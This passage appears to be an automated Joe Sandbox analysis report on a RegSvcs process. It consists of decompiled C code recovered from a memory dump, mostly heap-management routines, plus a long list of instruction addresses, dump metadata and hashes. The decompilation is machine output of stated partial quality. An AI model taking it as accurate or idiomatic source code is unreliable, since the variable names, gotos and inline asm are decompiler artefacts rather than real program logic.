						 *(_t426 + 8) =  *(_t426 + 8) & 0x00000000;
					}
					_t425 = _a4;
					if( *_t425 != _t444) {
						goto L174;
					} else {
						_t425[4] = _t426;
						_t306 = _t425[4] & 0x00000001;
						if(_t306 != 0) {
							_t425[4] = _t425[4] | 0x00000001;
						}
						 *_t425 = _t426;
						goto L24;
					}
				} else {
					_t452 =  *(_t422 + 4);
					if(_t385 != 0) {
						if(_t452 != 0) {
							_t452 = _t452 ^ _t422;
						}
					}
					if(_t452 == _t444) {
						_v16 = 1;
						L11:
						_t373 =  *(_t444 + 8);
						goto L12;
					} else {
						_t387 =  *_t422;
						if(_v5 != 0) {
							if(_t387 != 0) {
								_t387 = _t387 ^ _t422;
							}
						}
						if(_t387 != _t444) {
							goto L174;
						} else {
							_t488 = _a4;
							_v16 = _v16 & 0x00000000;
							_t388 =  *(_t488 + 4);
							_v24 = _t388;
							if((_t388 & 0xfffffffe) == _t444) {
								if(_t426 != 0) {
									 *(_t488 + 4) = _t426;
									if((_v24 & 0x00000001) != 0) {
										_t390 = _t426;
										L228:
										 *(_t488 + 4) = _t390 | 0x00000001;
									}
									goto L11;
								}
								 *(_t488 + 4) = _t422;
								if((_v24 & 0x00000001) == 0) {
									goto L11;
								} else {
									_t390 = _t422;
									goto L228;
								}
							}
							goto L11;
						}
					}
				}
			}








































































































                                          0x012ff90b
                                          0x012ff911
                                          0x012ff917
                                          0x012ff919
                                          0x012ff91c
                                          0x01355d63
                                          0x01355d69
                                          0x01355d69
                                          0x01355d63
                                          0x012ff922
                                          0x012ff927
                                          0x01355d72
                                          0x01355d78
                                          0x01355d78
                                          0x01355d72
                                          0x012ff92d
                                          0x012ff931
                                          0x012ffa2d
                                          0x012ffa2d
                                          0x012ff939
                                          0x012ff940
                                          0x012ff944
                                          0x012ffa37
                                          0x012ffa39
                                          0x012ffa3c
                                          0x012ffa3e
                                          0x012ffa41
                                          0x012ffa48
                                          0x012ffe68
                                          0x012ffe6c
                                          0x012ffe6c
                                          0x012ffe78
                                          0x012ffe78
                                          0x012ffe7a
                                          0x012ffe7a
                                          0x012ffe7e
                                          0x012ffe6e
                                          0x012ffe6e
                                          0x012ffe72
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x012ffe80
                                          0x012ffe80
                                          0x012ffe83
                                          0x00000000
                                          0x012ffe83
                                          0x01355d7f
                                          0x01355d81
                                          0x00000000
                                          0x00000000
                                          0x01355d87
                                          0x00000000
                                          0x01355d87
                                          0x012ffa4e
                                          0x012ffa50
                                          0x01355d90
                                          0x00000000
                                          0x00000000
                                          0x01355d98
                                          0x012ffa58
                                          0x012ffa58
                                          0x012ffa5d
                                          0x012ffa60
                                          0x012ffa63
                                          0x012ffa69
                                          0x012ffa6b
                                          0x012ffa6e
                                          0x012ffa71
                                          0x01355da1
                                          0x01355da7
                                          0x01355da7
                                          0x01355da1
                                          0x012ffa79
                                          0x01300071
                                          0x01300073
                                          0x01300074
                                          0x00000000
                                          0x012ffa7f
                                          0x012ffa83
                                          0x012ffa85
                                          0x01355dae
                                          0x01355dae
                                          0x012ffa8b
                                          0x012ffa8f
                                          0x012ffa98
                                          0x012ffaa1
                                          0x012ffaa4
                                          0x012ffaa6
                                          0x012ffaa9
                                          0x012ffaac
                                          0x01355db7
                                          0x01355dbd
                                          0x01355dbd
                                          0x01355db7
                                          0x012ffab4
                                          0x00000000
                                          0x012ffaba
                                          0x012ffabc
                                          0x012ffac2
                                          0x012ffac5
                                          0x012ffac7
                                          0x012ffac7
                                          0x012ffad6
                                          0x012ffad9
                                          0x012ffadf
                                          0x012ffae2
                                          0x012ffae4
                                          0x012ffae7
                                          0x012ffaea
                                          0x012ffaed
                                          0x01355dc4
                                          0x01355dc9
                                          0x00000000
                                          0x00000000
                                          0x01355dcf
                                          0x012ffaf6
                                          0x012ffafa
                                          0x012ffafc
                                          0x012ffafc
                                          0x012ffafe
                                          0x012ffb01
                                          0x012ffb09
                                          0x012ffb0c
                                          0x012ffb12
                                          0x012ffb14
                                          0x012ffb17
                                          0x01355dd6
                                          0x01355dd9
                                          0x01355dde
                                          0x00000000
                                          0x00000000
                                          0x01355de4
                                          0x01355de7
                                          0x012ffb29
                                          0x012ffb2c
                                          0x01355df3
                                          0x01355df6
                                          0x01355e06
                                          0x01355e0c
                                          0x01355e0f
                                          0x01355e11
                                          0x00000000
                                          0x01355e1f
                                          0x00000000
                                          0x01355e1f
                                          0x01355e11
                                          0x01355df8
                                          0x01355dfb
                                          0x01355e00
                                          0x00000000
                                          0x00000000
                                          0x01355e02
                                          0x00000000
                                          0x01355e02
                                          0x012ffb32
                                          0x012ffb35
                                          0x012ffb3c
                                          0x01355e26
                                          0x01355e28
                                          0x01355e28
                                          0x01355e2e
                                          0x01355e3c
                                          0x01355e3c
                                          0x01355e2e
                                          0x012ffb45
                                          0x012ffb47
                                          0x012ffb53
                                          0x012ffb56
                                          0x012ffb59
                                          0x012ffb5c
                                          0x012ffb65
                                          0x0130000d
                                          0x00000000
                                          0x0130000f
                                          0x0130000f
                                          0x00000000
                                          0x0130000f
                                          0x012ffb6b
                                          0x012ffb6e
                                          0x012ffb71
                                          0x012ffb73
                                          0x012ffb76
                                          0x01355e45
                                          0x01355e4b
                                          0x01355e4b
                                          0x01355e45
                                          0x012ffb80
                                          0x012ffb83
                                          0x01355e54
                                          0x01355e5a
                                          0x01355e5a
                                          0x01355e54
                                          0x012ffb89
                                          0x012ffb98
                                          0x012ffb9b
                                          0x012ffb9e
                                          0x012ffba0
                                          0x01355e63
                                          0x01355e69
                                          0x01355e69
                                          0x01355e63
                                          0x012ffba8
                                          0x00000000
                                          0x012ffbae
                                          0x012ffbb2
                                          0x01355e70
                                          0x012ffbb8
                                          0x012ffbb8
                                          0x012ffbb8
                                          0x012ffbbd
                                          0x012ffbbf
                                          0x012ffbbf
                                          0x012ff9a8
                                          0x012ff9a8
                                          0x012ff9ad
                                          0x012ff9b4
                                          0x01355eda
                                          0x00000000
                                          0x00000000
                                          0x01355ee2
                                          0x012ff9bc
                                          0x012ff9bc
                                          0x012ff9bf
                                          0x012ff9c4
                                          0x012ffde6
                                          0x012ffde9
                                          0x012ffdec
                                          0x012ffdef
                                          0x012ffdf2
                                          0x01355eeb
                                          0x01355ef1
                                          0x01355ef1
                                          0x01355eeb
                                          0x012ffdfa
                                          0x00000000
                                          0x012ffe00
                                          0x012ffe04
                                          0x01355efa
                                          0x01355f00
                                          0x01355f00
                                          0x01355efa
                                          0x012ffe0a
                                          0x012ffa24
                                          0x012ffa2a
                                          0x012ffa2a
                                          0x012ffdfa
                                          0x012ff9cd
                                          0x00000000
                                          0x012ff9cf
                                          0x012ff9cf
                                          0x012ff9d1
                                          0x012ff9d4
                                          0x012ff9d7
                                          0x012ff9d9
                                          0x012ff9dc
                                          0x012ff9df
                                          0x012ff9e2
                                          0x012ff9e7
                                          0x01355f09
                                          0x00000000
                                          0x00000000
                                          0x01355f11
                                          0x012ff9ef
                                          0x012ff9f3
                                          0x012ffed5
                                          0x012ffed8
                                          0x012ffedb
                                          0x01355f1a
                                          0x01355f20
                                          0x01355f20
                                          0x01355f1a
                                          0x012ffee3
                                          0x00000000
                                          0x012ffee9
                                          0x012ffeeb
                                          0x01355f29
                                          0x01355f2f
                                          0x01355f2f
                                          0x01355f29
                                          0x012ffef3
                                          0x00000000
                                          0x012ffef9
                                          0x012ffefc
                                          0x012fff01
                                          0x01355f38
                                          0x01300052
                                          0x01300054
                                          0x00000000
                                          0x01300056
                                          0x01300056
                                          0x012fff40
                                          0x012fff42
                                          0x01355f6e
                                          0x01355f74
                                          0x01355f74
                                          0x01355f6e
                                          0x012fff50
                                          0x012fff56
                                          0x012fff5b
                                          0x01355f7d
                                          0x00000000
                                          0x00000000
                                          0x01355f83
                                          0x00000000
                                          0x012fff61
                                          0x012fff61
                                          0x012fff63
                                          0x01300021
                                          0x01300026
                                          0x0130002b
                                          0x0130007e
                                          0x01300080
                                          0x01300080
                                          0x0130007e
                                          0x0130002f
                                          0x00000000
                                          0x01300031
                                          0x01300033
                                          0x01300086
                                          0x01300035
                                          0x01300035
                                          0x01300035
                                          0x0130003c
                                          0x00000000
                                          0x0130003c
                                          0x0130002f
                                          0x012fff69
                                          0x012fff6b
                                          0x01355f8c
                                          0x01355f92
                                          0x01355f92
                                          0x01355f8c
                                          0x012fff74
                                          0x012fff77
                                          0x012fff7b
                                          0x01355f99
                                          0x01355f9b
                                          0x012fff81
                                          0x012fff81
                                          0x012fff83
                                          0x012fff83
                                          0x012fff88
                                          0x012fff8b
                                          0x012fff90
                                          0x012fff92
                                          0x012fff92
                                          0x012fff9c
                                          0x012fffa2
                                          0x012fffa6
                                          0x012fffaa
                                          0x012fffad
                                          0x012fffb2
                                          0x01355fa4
                                          0x01355faa
                                          0x01355faa
                                          0x01355fa4
                                          0x012fffb8
                                          0x00000000
                                          0x012fffb8
                                          0x012fff5b
                                          0x01300054
                                          0x01355f3e
                                          0x01355f3e
                                          0x012fff09
                                          0x00000000
                                          0x00000000
                                          0x012fff0f
                                          0x012fff14
                                          0x01355f47
                                          0x01355f4d
                                          0x01355f4d
                                          0x01355f47
                                          0x012fff1c
                                          0x01300046
                                          0x01300076
                                          0x01300078
                                          0x00000000
                                          0x01300048
                                          0x01300048
                                          0x0130004a
                                          0x0130004a
                                          0x00000000
                                          0x0130004a
                                          0x012fff22
                                          0x012fff22
                                          0x012fff26
                                          0x01355f56
                                          0x01355f5c
                                          0x01355f5c
                                          0x01355f56
                                          0x012fff2e
                                          0x00000000
                                          0x012fff34
                                          0x012fff36
                                          0x01355f65
                                          0x012fff3c
                                          0x012fff3c
                                          0x012fff3c
                                          0x012fff3e
                                          0x00000000
                                          0x012fff3e
                                          0x012fff2e
                                          0x012fff1c
                                          0x012ffef3
                                          0x012ffee3
                                          0x012ff9f9
                                          0x012ff9f9
                                          0x012ff9fb
                                          0x012ff9ff
                                          0x012ffbd5
                                          0x01355fb1
                                          0x01355fb1
                                          0x012ffbdf
                                          0x00000000
                                          0x012ffbe5
                                          0x012ffbe5
                                          0x012ffbe8
                                          0x012ffbed
                                          0x01355fdf
                                          0x012ffc01
                                          0x012ffc01
                                          0x012ffc04
                                          0x012ffc09
                                          0x01355fee
                                          0x01355ff4
                                          0x01355ff4
                                          0x01355fee
                                          0x012ffc0f
                                          0x012ffc13
                                          0x012ffc1d
                                          0x012ffc20
                                          0x012ffc23
                                          0x012ffc26
                                          0x012ffc2b
                                          0x01355ffd
                                          0x01356003
                                          0x01356003
                                          0x01355ffd
                                          0x012ffc33
                                          0x00000000
                                          0x012ffc39
                                          0x012ffc3b
                                          0x012ffc3e
                                          0x012ffc41
                                          0x012ffc46
                                          0x0135600c
                                          0x01356012
                                          0x01356012
                                          0x0135600c
                                          0x012ffc4e
                                          0x00000000
                                          0x012ffc54
                                          0x012ffc54
                                          0x012ffc59
                                          0x0135601b
                                          0x01356021
                                          0x01356021
                                          0x0135601b
                                          0x012ffc61
                                          0x00000000
                                          0x012ffc67
                                          0x012ffc6a
                                          0x012ffc6f
                                          0x0135602a
                                          0x01356030
                                          0x01356030
                                          0x0135602a
                                          0x012ffc77
                                          0x00000000
                                          0x012ffc7d
                                          0x012ffc7f
                                          0x012ffc81
                                          0x012ffc85
                                          0x012ffc87
                                          0x012ffc87
                                          0x012ffc8c
                                          0x012ffc8f
                                          0x012ffc94
                                          0x01356039
                                          0x012ffc9c
                                          0x012ffca4
                                          0x012ffcaa
                                          0x012ffcaf
                                          0x01356046
                                          0x012ffcbd
                                          0x012ffcbf
                                          0x0135606d
                                          0x01356073
                                          0x01356073
                                          0x0135606d
                                          0x012ffcc8
                                          0x012ffccd
                                          0x012ffccf
                                          0x012ffcd3
                                          0x012ffcd5
                                          0x012ffcd5
                                          0x012ffcde
                                          0x012ffce1
                                          0x012ffce3
                                          0x012ffce3
                                          0x012ffce8
                                          0x012ffcf0
                                          0x012ffcf2
                                          0x012ffcf5
                                          0x012ffcf7
                                          0x012ffcff
                                          0x012ffd02
                                          0x012ffd06
                                          0x012ffd11
                                          0x012ffd14
                                          0x012ffd17
                                          0x0135607c
                                          0x01356082
                                          0x01356082
                                          0x0135607c
                                          0x012ffd1f
                                          0x00000000
                                          0x012ffd25
                                          0x012ffd28
                                          0x012ffd2d
                                          0x0135608b
                                          0x01356091
                                          0x01356091
                                          0x0135608b
                                          0x012ffd35
                                          0x00000000
                                          0x012ffd3b
                                          0x012ffd3e
                                          0x012ffd43
                                          0x0135609a
                                          0x01300016
                                          0x01300018
                                          0x00000000
                                          0x0130001a
                                          0x0130001a
                                          0x012ffd82
                                          0x012ffd84
                                          0x013560d9
                                          0x013560df
                                          0x013560df
                                          0x013560d9
                                          0x012ffd8d
                                          0x012ffd95
                                          0x012ffd98
                                          0x012ffd9d
                                          0x013560e8
                                          0x00000000
                                          0x00000000
                                          0x013560ee
                                          0x00000000
                                          0x012ffda3
                                          0x012ffda3
                                          0x012ffda5
                                          0x012ffe8b
                                          0x012ffe90
                                          0x012ffe95
                                          0x013560f7
                                          0x013560fd
                                          0x013560fd
                                          0x013560f7
                                          0x012ffe9d
                                          0x00000000
                                          0x012ffea3
                                          0x012ffea5
                                          0x01356106
                                          0x012ffeab
                                          0x012ffeab
                                          0x012ffeab
                                          0x012ffeb2
                                          0x012ffeb5
                                          0x00000000
                                          0x012ffeb5
                                          0x012ffe9d
                                          0x012ffdab
                                          0x012ffdad
                                          0x0135610f
                                          0x01356115
                                          0x01356115
                                          0x0135610f
                                          0x012ffdb6
                                          0x012ffdbb
                                          0x0135611e
                                          0x01356120
                                          0x012ffdc1
                                          0x012ffdc1
                                          0x012ffdc5
                                          0x012ffdc5
                                          0x012ffdc7
                                          0x012ffdcc
                                          0x012ffdce
                                          0x012ffdce
                                          0x012ffdd6
                                          0x012ffdd8
                                          0x00000000
                                          0x012ffdd8
                                          0x012ffd9d
                                          0x01300018
                                          0x013560a0
                                          0x013560a0
                                          0x012ffd4b
                                          0x00000000
                                          0x00000000
                                          0x012ffd51
                                          0x012ffd56
                                          0x013560a9
                                          0x013560af
                                          0x013560af
                                          0x013560a9
                                          0x012ffd5e
                                          0x012ffebf
                                          0x013560b8
                                          0x012ffec5
                                          0x012ffec5
                                          0x012ffec5
                                          0x012ffec7
                                          0x00000000
                                          0x012ffd64
                                          0x012ffd64
                                          0x012ffd68
                                          0x013560c1
                                          0x013560c7
                                          0x013560c7
                                          0x013560c1
                                          0x012ffd70
                                          0x00000000
                                          0x012ffd76
                                          0x012ffd78
                                          0x013560d0
                                          0x012ffd7e
                                          0x012ffd7e
                                          0x012ffd7e
                                          0x012ffd80
                                          0x00000000
                                          0x012ffd80
                                          0x012ffd70
                                          0x012ffd5e
                                          0x012ffd35
                                          0x012ffd1f
                                          0x0135604c
                                          0x0135604c
                                          0x012ffcb7
                                          0x012fffc0
                                          0x012fffc3
                                          0x012fffc6
                                          0x012fffcb
                                          0x01356055
                                          0x0135605b
                                          0x0135605b
                                          0x01356055
                                          0x012fffd3
                                          0x00000000
                                          0x012fffd9
                                          0x012fffdb
                                          0x01356064
                                          0x012fffe1
                                          0x012fffe1
                                          0x012fffe1
                                          0x012fffe3
                                          0x012fffe7
                                          0x012fffed
                                          0x00000000
                                          0x012fffed
                                          0x012fffd3
                                          0x00000000
                                          0x012ffcb7
                                          0x0135603f
                                          0x012ffc9a
                                          0x00000000
                                          0x012ffc9a
                                          0x012ffc77
                                          0x012ffc61
                                          0x012ffc4e
                                          0x012ffc33
                                          0x01355fe5
                                          0x01355fe5
                                          0x012ffbf5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x012ffbf5
                                          0x012ffbdf
                                          0x012ffa05
                                          0x012ffa05
                                          0x012ffa0a
                                          0x012ffe14
                                          0x01355fb8
                                          0x01355fb8
                                          0x012ffe1e
                                          0x00000000
                                          0x012ffe24
                                          0x00000000
                                          0x012ffe24
                                          0x012ffe1e
                                          0x012ffa10
                                          0x012ffa10
                                          0x012ffa15
                                          0x012ffe29
                                          0x012ffe2d
                                          0x012ffe35
                                          0x012ffe38
                                          0x012ffe3b
                                          0x01355fc1
                                          0x00000000
                                          0x00000000
                                          0x01355fc7
                                          0x012ffe43
                                          0x012ffe45
                                          0x00000000
                                          0x00000000
                                          0x012ffe4b
                                          0x012ffe50
                                          0x01355fd0
                                          0x01355fd6
                                          0x01355fd6
                                          0x01355fd0
                                          0x012ffe5d
                                          0x012ffe60
                                          0x00000000
                                          0x012ffe60
                                          0x012ffe41
                                          0x012ffe41
                                          0x00000000
                                          0x012ffa1b
                                          0x012ffa1b
                                          0x012ffa1d
                                          0x012ffa20
                                          0x00000000
                                          0x012ffa20
                                          0x012ffa15
                                          0x012ff9ed
                                          0x012ff9ed
                                          0x00000000
                                          0x012ff9ed
                                          0x012ff9cd
                                          0x012ff9ba
                                          0x012ff9ba
                                          0x00000000
                                          0x012ff9ba
                                          0x012ffba8
                                          0x012ffb65
                                          0x012ffb1d
                                          0x012ffb23
                                          0x012ffb26
                                          0x00000000
                                          0x012ffb26
                                          0x012ffaf3
                                          0x012ffaf3
                                          0x00000000
                                          0x012ffaf3
                                          0x012ffab4
                                          0x012ffa79
                                          0x012ffa56
                                          0x012ffa56
                                          0x00000000
                                          0x012ffa56
                                          0x012ff94d
                                          0x012ff950
                                          0x012ff955
                                          0x01355e79
                                          0x01355e7f
                                          0x01355e7f
                                          0x01355e79
                                          0x012ff95b
                                          0x012ff960
                                          0x01355e88
                                          0x01355e8a
                                          0x01355e8a
                                          0x01355e8e
                                          0x01355e93
                                          0x00000000
                                          0x01355e99
                                          0x01355e9c
                                          0x01355e9f
                                          0x01355ea1
                                          0x01355ea3
                                          0x01355ea3
                                          0x01355ea7
                                          0x00000000
                                          0x01355ea7
                                          0x012ff966
                                          0x012ff966
                                          0x012ff96b
                                          0x01355eb0
                                          0x01355eb6
                                          0x01355eb6
                                          0x01355eb0
                                          0x012ff973
                                          0x012ffbc7
                                          0x012ff9a5
                                          0x012ff9a5
                                          0x00000000
                                          0x012ff979
                                          0x012ff97d
                                          0x012ff97f
                                          0x01355ebf
                                          0x01355ec5
                                          0x01355ec5
                                          0x01355ebf
                                          0x012ff987
                                          0x00000000
                                          0x012ff98d
                                          0x012ff98d
                                          0x012ff990
                                          0x012ff994
                                          0x012ff997
                                          0x012ff99f
                                          0x012ffff7
                                          0x01300061
                                          0x01300064
                                          0x0130006a
                                          0x01355ece
                                          0x01355ed0
                                          0x01355ed0
                                          0x00000000
                                          0x01300064
                                          0x012ffffd
                                          0x01300000
                                          0x00000000
                                          0x01300006
                                          0x01355ecc
                                          0x00000000
                                          0x01355ecc
                                          0x01300000
                                          0x00000000
                                          0x012ff99f
                                          0x012ff987
                                          0x012ff973

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
                                          • Instruction ID: d110fa7a12dc739ffbd83ab0ef6dd714057b85e42fd911d45fb4ba5f738fdd9b
                                          • Opcode Fuzzy Hash: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
                                          • Instruction Fuzzy Hash: 3962F733E247668BDB27CE1CC64176AFBB06F45A58F1982BCCE559B382D371D8418780
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013C5BA5 Relevance: .6, Instructions: 592COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E013C5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x13d1178);
				E0134D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E013C4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0133D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E013C5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x13e60e8;
								if( *0x13e60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x13e60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E01339710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E01336DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
